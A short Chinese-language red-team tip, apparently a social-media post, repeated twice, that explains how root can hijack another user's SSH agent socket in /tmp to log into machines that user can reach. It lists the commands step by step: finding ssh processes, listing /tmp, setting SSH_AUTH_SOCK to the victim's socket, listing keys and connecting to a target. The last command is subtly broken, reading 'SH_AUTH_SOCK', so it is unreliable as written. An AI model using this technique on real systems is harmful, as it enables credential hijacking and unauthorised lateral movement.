Red Teamers:SSH 将正在进行的会话的密钥缓存在 /tmp 中;
root 用户可以劫持它们并通过 SSH 连接到用户可以访问的任何计算机。
ps aux | grep ssh
ls -lah /tmp
SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh-add -l
SH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh alh4zr3d@target
Red Teamers:SSH 将正在进行的会话的密钥缓存在 /tmp 中;
root 用户可以劫持它们并通过 SSH 连接到用户可以访问的任何计算机。
ps aux | grep ssh
ls -lah /tmp
SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh-add -l
SH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh alh4zr3d@target